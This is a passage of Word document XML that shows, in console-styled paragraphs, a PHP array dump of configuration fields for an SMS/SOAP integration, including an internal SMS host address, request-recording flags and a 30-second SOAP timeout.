          <w:p w14:paraId="53E781C9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736AD28F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="641CB048"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3BA3AF92" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SMSHost</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11933FB8" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59003ADA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78DEA232" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 40,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="100152AD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SMS Host',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DCD69BA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C5DC4DB" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'https://192.168.5.85',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6455FFEA" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5247A5AC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21ABA661" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="511AAA7C"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70B2952" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="523CF333" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="074ABF27" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5993E38E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="198D94C2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Request',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6790859B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E626ED1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="114203CC" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C98619B" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE54F7F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3427B353"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217381D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>RecordResultData</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FD09CE1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="011F56C2" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A4FFD10" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59AC0536" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Record Result Data',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3750C903" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="313C58E6" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '0',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="732B3D1A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CD40E92" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E3FE841" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04BDF110"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5D5B86D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SOAP_Timeout</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7310D741" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="681ED884" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02651C32" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 4,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7BF74E47" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'SOAP Request Timeout (Seconds)',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5982E8C3" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E28720F" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; '30',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40AC6E89" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">             '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_array_pos</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32194361" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          )),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E3AB044" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C88D3E0" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_tpl_methods</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28353AE7" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        array (</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D217395" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          0 =&gt; 'label',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="275BCF6E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          1 =&gt; 'input',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08318090" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">          2 =&gt; 'select',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1DC05E" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          3 =&gt; 'value',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0669CEDD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          4 =&gt; 'radio',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24319960" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          5 =&gt; 'checkbox',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1DD5CE58" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">          6 =&gt; 'text',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E59D0F9" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">        ),</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46B2B37A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; false,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="509C330D" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_listIndex</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="135F4A80" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">         '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_fld</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">' =&gt; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49B9BCA2"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5866C2A" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_name</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Result',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40F074E1" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_isnumeric</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63C0ABAF" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_cardinality</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 1,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71875181" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_len</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 0,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F4EC882" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_label</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; 'Response',</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C6F0CCD" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_keywords</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B4AEBC5" w14:textId="77777777" w:rsidR="00F3225C" w:rsidRDefault="00F3225C" w:rsidP="00F3225C">
            <w:pPr>
              <w:pStyle w:val="Console"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">           '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>m_data</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>' =&gt; NULL,</w:t>
            </w:r>
          </w:p>
